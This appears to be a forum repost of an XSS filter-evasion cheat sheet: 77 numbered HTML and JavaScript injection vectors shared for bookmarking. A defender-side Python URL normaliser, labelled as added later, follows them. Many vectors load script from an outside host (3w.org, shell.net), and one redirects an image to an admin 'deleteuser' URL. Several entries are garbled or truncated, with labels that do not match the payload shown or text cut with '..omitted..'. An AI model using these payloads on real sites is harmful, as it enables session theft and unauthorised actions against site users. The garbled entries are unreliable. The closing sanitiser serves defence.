It seems t00ls has relatively little material on XSS, so when I saw something good I copied it over; not sure whether any classmates need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, since there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can sneak in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting the [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting the [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
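As an added, defender-side example (not part of the original post or of the cheat sheet it copies), the Python below normalises an attribute URL the way browsers do before reading its scheme, so a filter still sees the javascript:/vbscript: scheme behind the case changes, HTML entities, embedded tab/newline and NUL tricks of items (3) to (19), and it folds the decimal, hex and octal host forms of items (70) to (72) back to a dotted quad. All function names are my own, and the sample values are constructed from the vectors above.

```python
import html
import re
from urllib.parse import urlsplit
# Schemes the vectors above smuggle into SRC/HREF/BACKGROUND/url() values.
SCRIPT_SCHEMES = ("javascript:", "vbscript:")

def normalize_attr_url(value: str) -> str:
    """Undo what a browser tolerates before reading the scheme: HTML entities
    (with or without ';'), NUL/tab/LF/CR mixed into the word, mixed case."""
    decoded = html.unescape(value)
    # Dropping every code point <= 32 over-approximates browsers on purpose (flag more, never less).
    return "".join(ch for ch in decoded if ord(ch) > 32).lower()

def is_script_url(value: str) -> bool:
    """True if the attribute value resolves to a javascript:/vbscript: URL."""
    return normalize_attr_url(value).startswith(SCRIPT_SCHEMES)

# Constructed samples built from the vectors above (not captured from a real site).
SAMPLE_VALUES = [
    "JaVaScRiPt:alert('XSS')",                    # (4) mixed case
    "jav\tascript:alert('XSS');",                 # (11) embedded tab
    "jav&#x0A;ascript:alert('XSS');",             # (12) entity-encoded newline
    "&#106;&#97;&#118;&#97;script:alert('XSS')",  # (5) decimal entities
    "java\0script:alert(\"XSS\")",                # (17) NUL byte
    "http://3w.org/XSS/xss.js",                   # ordinary URL: not flagged
]

def flagged(values=SAMPLE_VALUES) -> list:
    """Return the values a sanitizer should reject."""
    return [v for v in values if is_script_url(v)]

def _ip_part(part: str) -> int:
    # Same precedence as inet_aton: 0x... is hex, a leading 0 is octal.
    base = 16 if part.lower().startswith("0x") else 8 if part.startswith("0") and len(part) > 1 else 10
    return int(part, base)

def canonical_host(url: str) -> str:
    """Fold the decimal, hex and octal hosts of (70)-(72) back to a dotted quad;
    other hosts come back lower-cased with any trailing dot (76) removed."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    parts = host.split(".")
    if not all(re.fullmatch(r"0x[0-9a-f]+|[0-9]+", p, re.IGNORECASE) for p in parts):
        return host
    nums = [_ip_part(p) for p in parts]
    addr = 0
    for n in nums[:-1]:  # inet_aton rule: the last part fills the remaining bytes
        addr = (addr << 8) | n
    addr = (addr << (8 * (5 - len(nums)))) | nums[-1]
    return ".".join(str((addr >> s) & 0xFF) for s in (24, 16, 8, 0))
```

Run the scheme check on the decoded attribute value, never on the raw markup, and compare hosts only after canonical_host so an allow-list cannot be slipped past with a numeric form.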